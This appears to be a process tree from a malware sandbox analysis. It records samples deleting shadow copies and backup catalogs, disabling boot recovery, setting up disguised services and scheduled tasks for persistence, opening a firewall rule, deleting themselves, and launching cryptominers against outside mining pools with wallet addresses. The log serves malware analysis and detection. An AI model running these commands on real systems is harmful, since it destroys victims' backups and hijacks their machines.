-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4108 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8500
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9676
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9580
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10064
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:8496
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{20d39870-1be1-4e42-ba5a-a33dea18db02}\oemvista.inf" "9" "4d14a44ff" "0000000000000178" "WinSta0\Default" "000000000000017C" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:9376
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000198"2⤵PID:368
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:8144 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:8068
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2472
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:4044
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:2152
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8828
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9400 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:6424
-
-
C:\Users\Admin\AppData\Local\Temp\5FE0.exeC:\Users\Admin\AppData\Local\Temp\5FE0.exe1⤵PID:6988
-
C:\Users\Admin\AppData\Local\Temp\6158.exeC:\Users\Admin\AppData\Local\Temp\6158.exe1⤵PID:4044
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:9748
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\732C.exeC:\Users\Admin\AppData\Local\Temp\732C.exe1⤵PID:9332
-
C:\Users\Admin\AppData\Local\Temp\7772.exeC:\Users\Admin\AppData\Local\Temp\7772.exe1⤵PID:7812
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kuqkssdb\2⤵PID:9168
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\fxgolyke.exe" C:\Windows\SysWOW64\kuqkssdb\2⤵PID:6852
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create kuqkssdb binPath= "C:\Windows\SysWOW64\kuqkssdb\fxgolyke.exe /d\"C:\Users\Admin\AppData\Local\Temp\7772.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:7896
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description kuqkssdb "wifi internet conection"2⤵PID:9664
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start kuqkssdb2⤵PID:4456
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:6256
-
-
C:\Users\Admin\AppData\Local\Temp\7ADE.exeC:\Users\Admin\AppData\Local\Temp\7ADE.exe1⤵PID:9484
-
C:\Users\Admin\AppData\Local\Temp\81E4.exeC:\Users\Admin\AppData\Local\Temp\81E4.exe1⤵PID:9012
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9244
-
C:\Users\Admin\AppData\Local\Temp\9DBA.exeC:\Users\Admin\AppData\Local\Temp\9DBA.exe1⤵PID:6108
-
C:\Users\Admin\AppData\Local\Temp\9FA0.exeC:\Users\Admin\AppData\Local\Temp\9FA0.exe1⤵PID:6920
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:8072
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start2⤵PID:3520
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:4456
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:10416
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:7604
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 03⤵PID:5980
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:7156
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:11188
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:7280
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵PID:8924
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:10424
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:8720
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:5080
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:9172
-
-
-
C:\Users\Admin\AppData\Local\Temp\BBC4.exeC:\Users\Admin\AppData\Local\Temp\BBC4.exe1⤵PID:10032
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵PID:10120
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:7332
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:10372
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:6872
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵PID:11036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:9400
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:9528
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:11056
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:8252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:5300
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:11024
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:10056
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:2944
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:10116
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:10640
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:4852
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵PID:6636
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BBC4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BBC4.exe"2⤵PID:8116
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:7604
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:6852
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9024
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8348
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6268
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:6960
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7748
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9620
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:9496
-
C:\Windows\SysWOW64\kuqkssdb\fxgolyke.exeC:\Windows\SysWOW64\kuqkssdb\fxgolyke.exe /d"C:\Users\Admin\AppData\Local\Temp\7772.exe"1⤵PID:10208
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵PID:9516
-
C:\Windows\SysWOW64\svchost.exesvchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half3⤵PID:10576
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:9396
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:10072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9688
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10744
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5188
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10796
-
C:\Users\Admin\AppData\Roaming\swvttjsC:\Users\Admin\AppData\Roaming\swvttjs1⤵PID:9808
-
C:\Users\Admin\AppData\Roaming\euvttjsC:\Users\Admin\AppData\Roaming\euvttjs1⤵PID:9568
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:10848
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:8168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:9580
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4116
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6492
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9696
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5860
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5016
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x38c1⤵PID:6912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6232
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:6688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10264
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:3220
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3956
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:9912
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:2412
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:10708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4380
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1392
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:11212
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6924
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7540
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7464
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6360
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5084
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:896
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7736
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8232
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1